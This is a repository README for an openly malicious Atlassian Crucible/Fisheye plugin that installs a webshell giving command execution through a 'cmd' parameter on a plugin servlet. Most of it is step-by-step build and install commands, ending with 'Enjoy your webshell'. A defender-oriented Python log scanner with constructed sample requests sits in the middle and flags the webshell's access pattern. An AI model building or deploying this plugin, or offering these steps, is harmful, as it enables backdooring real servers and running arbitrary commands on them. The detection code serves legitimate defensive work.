A malicious plugin for Atlassian Crucible/Fisheye that when installed gives command execution

UgniusV/fecru-webshell-plugin

Summary

A malicious plugin for Atlassian Crucible/Fisheye that, when installed, gives command execution via the /plugins/servlet/twitter-settings?cmd=id endpoint.

Usage

  1. Install Atlassian Plugin SDK. E.g. for macOS:

        brew tap atlassian/tap
        brew install atlassian/tap/atlassian-plugin-sdk

  2. Clone this repo & cd into it:

        git clone https://github.com/UgniusV/fecru-webshell-plugin.git
        cd fecru-webshell-plugin

  3. Generate a JAR by running:

        atlas-package

  4. Generated JAR is now placed at ./target/fecrutwitter-1.0.0-SNAPSHOT.jar
  5. Navigate to http://crucible:8060/plugins/servlet/upm?source=side_nav_manage_addons & install the JAR
  6. Enjoy your webshell at: http://crucible:8060/plugins/servlet/twitter-settings?cmd=id
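
For defenders, the two URLs above are the observable footprint: a visit to the add-on manager followed by requests to a plugin servlet carrying a cmd parameter. The following is an added detection example, not code from this repository; the log layout (combined-log style), the finding names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed combined-log-style layout; adapt the regex to your access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')
SERVLET = "/plugins/servlet/"   # plugin servlet mount point shown on the page
UPM = "/plugins/servlet/upm"    # add-on manager URL shown on the page
SUSPECT_PARAMS = {"cmd"}        # parameter named on the page; extend locally

def scan(lines):
    """Return (kind, ip, user, path) findings in log order."""
    findings, upm_seen = [], False
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        url = urlsplit(m["target"])
        path = unquote(url.path).lower()  # decode %xx so encoded paths match
        if SERVLET not in path:
            continue
        if path.endswith(UPM) or UPM + "/" in path:
            upm_seen = True  # add-on manager was used earlier in this log
            findings.append(("addon-manager-access", m["ip"], m["user"], path))
            continue
        # Compare parameter names case-insensitively, values are not needed
        params = {k.lower() for k in parse_qs(url.query, keep_blank_values=True)}
        if params & SUSPECT_PARAMS:
            kind = "command-param-after-upm" if upm_seen else "command-param"
            findings.append((kind, m["ip"], m["user"], path))
    return findings

# Constructed sample lines (not real traffic); 192.0.2.0/24 is a documentation range.
SAMPLE = [
    '192.0.2.10 - admin [16/Jan/2023:10:01:02 +0000] "GET /plugins/servlet/upm?source=side_nav_manage_addons HTTP/1.1" 200 5120',
    '192.0.2.10 - - [16/Jan/2023:10:05:40 +0000] "GET /plugins/servlet/twitter-settings?cmd=id HTTP/1.1" 200 64',
    '192.0.2.44 - - [16/Jan/2023:10:06:00 +0000] "GET /plugins/servlet/twitter%2Dsettings?CMD=id HTTP/1.1" 200 64',
    '192.0.2.77 - bob [16/Jan/2023:10:07:00 +0000] "GET /browse/project HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

A cmd parameter on a servlet is a heuristic, not proof; treat a hit as a prompt to review the installed add-ons list and the JAR behind the servlet path.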

Important note

Currently this plugin is designed to work with Crucible/Fisheye 4.8.11. If you would like to install it on another version, change the version and build numbers accordingly inside pom.xml:

        <fecru.version>4.8.11-20221216114657</fecru.version>
        <fecru.data.version>4.8.11-20221216114657</fecru.data.version>
